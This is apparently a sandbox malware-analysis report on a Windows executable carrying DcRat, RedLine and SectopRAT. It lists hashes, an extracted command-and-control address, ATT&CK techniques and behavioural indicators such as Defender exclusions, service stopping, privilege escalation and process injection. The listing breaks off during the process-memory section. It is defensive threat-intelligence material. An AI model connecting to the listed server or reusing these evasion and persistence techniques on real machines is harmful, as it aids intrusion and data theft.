dcrat | ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06293c3726a8b6029225668dcfb8c7e8.exe
Size

7.3MB
MD5

06293c3726a8b6029225668dcfb8c7e8
SHA1

1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512

33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP

196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr

Score

10^/10

dcrat redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Lucifer

162.55.169.73:49194

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe	family_redline
behavioral2/memory/1584-14-0x0000000000650000-0x000000000066E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe	family_sectoprat
behavioral2/memory/1584-14-0x0000000000650000-0x000000000066E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4328 created 584 4328 powershell.EXE winlogon.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exe

pid process

2768 powershell.exe
1928 powershell.exe
4328 powershell.EXE
2196 powershell.EXE
1300 powershell.exe

description	pid	process	target process
PID 4328 created 584	4328	powershell.EXE	winlogon.exe

pid	process
2768	powershell.exe
1928	powershell.exe
4328	powershell.EXE
2196	powershell.EXE
1300	powershell.exe

Drops file in Drivers directory 4 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

4088 icacls.exe
1128 takeown.exe
2992 icacls.exe
5852 takeown.exe
5948 icacls.exe
5448 takeown.exe
2692 icacls.exe
5260 takeown.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4088	icacls.exe
1128	takeown.exe
2992	icacls.exe
5852	takeown.exe
5948	icacls.exe
5448	takeown.exe
2692	icacls.exe
5260	takeown.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

windowshost.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	windowshost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 7 IoCs

Processes:

svchost.exewindowshost.exeexplorer.exesvchost.execominto.exeupdater.exeupdater.exe

pid process

4340 svchost.exe
2104 windowshost.exe
1584 explorer.exe
2252 svchost.exe
912 cominto.exe
5688 updater.exe
4468 updater.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

2692 icacls.exe
5260 takeown.exe
4088 icacls.exe
1128 takeown.exe
2992 icacls.exe
5852 takeown.exe
5948 icacls.exe
5448 takeown.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

pid	process
4340	svchost.exe
2104	windowshost.exe
1584	explorer.exe
2252	svchost.exe
912	cominto.exe
5688	updater.exe
4468	updater.exe

pid	process
2692	icacls.exe
5260	takeown.exe
4088	icacls.exe
1128	takeown.exe
2992	icacls.exe
5852	takeown.exe
5948	icacls.exe
5448	takeown.exe

Power Settings 1 TTPs 20 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	process
3232	powercfg.exe
964	powercfg.exe
5692	powercfg.exe
3172	cmd.exe
100	powercfg.exe
4660	cmd.exe
5208	powercfg.exe
2256	cmd.exe
5500	powercfg.exe
2528	powercfg.exe
3024	powercfg.exe
1972	powercfg.exe
5720	powercfg.exe
4992	cmd.exe
2536	powercfg.exe
2220	powercfg.exe
4384	powercfg.exe
5156	powercfg.exe
3740	powercfg.exe
2864	powercfg.exe

Drops file in System32 directory 13 IoCs

Processes:

svchost.exeOfficeClickToRun.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 5 IoCs

Processes:

conhost.execonhost.exepowershell.EXEconhost.execonhost.exe

description	pid	process	target process
PID 4548 set thread context of 2220	4548	conhost.exe	powercfg.exe
PID 964 set thread context of 3088	964	conhost.exe	conhost.exe
PID 4328 set thread context of 760	4328	powershell.EXE	dllhost.exe
PID 6044 set thread context of 2992	6044	conhost.exe	conhost.exe
PID 2684 set thread context of 5336	2684	conhost.exe	conhost.exe

Drops file in Windows directory 8 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 60 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5756	sc.exe
5832	sc.exe
1476	sc.exe
5564	sc.exe
5236	sc.exe
4532	sc.exe
372	sc.exe
4312	sc.exe
3176	sc.exe
4896	sc.exe
2548	sc.exe
4540	sc.exe
5540	sc.exe
3352	sc.exe
228	sc.exe
5216	sc.exe
5152	sc.exe
4456	sc.exe
5360	sc.exe
5744	sc.exe
5672	sc.exe
5132	sc.exe
3172	sc.exe
1616	sc.exe
5272	sc.exe
372	sc.exe
4248	sc.exe
5428	sc.exe
4268	sc.exe
6104	sc.exe
2880	sc.exe
2772	sc.exe
5940	sc.exe
3612	sc.exe
5988	sc.exe
5864	sc.exe
3724	sc.exe
3176	sc.exe
3520	sc.exe
5728	sc.exe
3580	sc.exe
5464	sc.exe
5636	sc.exe
5776	sc.exe
5960	sc.exe
1280	sc.exe
6036	sc.exe
1976	sc.exe
2056	sc.exe
5504	sc.exe
5724	sc.exe
4268	sc.exe
3024	sc.exe
2696	sc.exe
5360	sc.exe
3620	sc.exe
5660	sc.exe
6080	sc.exe
5952	sc.exe
5784	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exepowershell.exe06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.exeexplorer.exeWScript.execmd.execmd.exewindowshost.exepowershell.EXEcmd.execmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	06293c3726a8b6029225668dcfb8c7e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windowshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

svchost.exepowershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D750C836-6DA6-467B-A44A-33C88B5171B5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 07 Nov 2024 10:49:38 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 2 IoCs

Processes:

windowshost.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	windowshost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2456 schtasks.exe
3620 schtasks.exe

pid	process
2456	schtasks.exe
3620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.EXEdllhost.exe

pid	process
1300	powershell.exe
2768	powershell.exe
1300	powershell.exe
2768	powershell.exe
1928	powershell.exe
1928	powershell.exe
1176	powershell.exe
1176	powershell.exe
3976	powershell.exe
3976	powershell.exe
3976	powershell.exe
1176	powershell.exe
4548	conhost.exe
4548	conhost.exe
964	conhost.exe
2196	powershell.EXE
4328	powershell.EXE
4328	powershell.EXE
4328	powershell.EXE
2196	powershell.EXE
2196	powershell.EXE
4328	powershell.EXE
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe
760	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeexplorer.execominto.exepowershell.exepowershell.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowershell.EXEpowershell.EXEpowercfg.exepowercfg.exepowercfg.exedllhost.exeExplorer.EXEsvchost.exepowershell.exepowershell.execonhost.exesvchost.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	1584	explorer.exe
Token: SeDebugPrivilege	912	cominto.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	4548	conhost.exe
Token: SeShutdownPrivilege	3740	powercfg.exe
Token: SeCreatePagefilePrivilege	3740	powercfg.exe
Token: SeShutdownPrivilege	2864	powercfg.exe
Token: SeCreatePagefilePrivilege	2864	powercfg.exe
Token: SeShutdownPrivilege	2528	powercfg.exe
Token: SeCreatePagefilePrivilege	2528	powercfg.exe
Token: SeShutdownPrivilege	3024	powercfg.exe
Token: SeCreatePagefilePrivilege	3024	powercfg.exe
Token: SeDebugPrivilege	964	conhost.exe
Token: SeShutdownPrivilege	100	powercfg.exe
Token: SeCreatePagefilePrivilege	100	powercfg.exe
Token: SeDebugPrivilege	2196	powershell.EXE
Token: SeDebugPrivilege	4328	powershell.EXE
Token: SeShutdownPrivilege	2536	powercfg.exe
Token: SeCreatePagefilePrivilege	2536	powercfg.exe
Token: SeShutdownPrivilege	3232	powercfg.exe
Token: SeCreatePagefilePrivilege	3232	powercfg.exe
Token: SeShutdownPrivilege	2220	powercfg.exe
Token: SeCreatePagefilePrivilege	2220	powercfg.exe
Token: SeDebugPrivilege	4328	powershell.EXE
Token: SeDebugPrivilege	760	dllhost.exe
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeAuditPrivilege	2592	svchost.exe
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeShutdownPrivilege	3528	Explorer.EXE
Token: SeCreatePagefilePrivilege	3528	Explorer.EXE
Token: SeDebugPrivilege	6044	conhost.exe
Token: SeAssignPrimaryTokenPrivilege	1772	svchost.exe
Token: SeIncreaseQuotaPrivilege	1772	svchost.exe
Token: SeSecurityPrivilege	1772	svchost.exe
Token: SeTakeOwnershipPrivilege	1772	svchost.exe
Token: SeLoadDriverPrivilege	1772	svchost.exe
Token: SeSystemtimePrivilege	1772	svchost.exe
Token: SeBackupPrivilege	1772	svchost.exe
Token: SeRestorePrivilege	1772	svchost.exe
Token: SeShutdownPrivilege	1772	svchost.exe
Token: SeSystemEnvironmentPrivilege	1772	svchost.exe
Token: SeUndockPrivilege	1772	svchost.exe
Token: SeManageVolumePrivilege	1772	svchost.exe
Token: SeShutdownPrivilege	4384	powercfg.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

3528 Explorer.EXE
3528 Explorer.EXE
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid process

5284 Conhost.exe
5440 Conhost.exe
5888 Conhost.exe
5280 Conhost.exe
1020 Conhost.exe

pid	process
3528	Explorer.EXE
3528	Explorer.EXE

pid	process
5284	Conhost.exe
5440	Conhost.exe
5888	Conhost.exe
5280	Conhost.exe
1020	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exesvchost.exesvchost.execonhost.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1384 wrote to memory of 4432	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 4432	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 4432	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 4148	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 4148	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 4148	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 1168	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 1168	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 1168	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
PID 1384 wrote to memory of 3172	1384	06293c3726a8b6029225668dcfb8c7e8.exe	cmd.exe
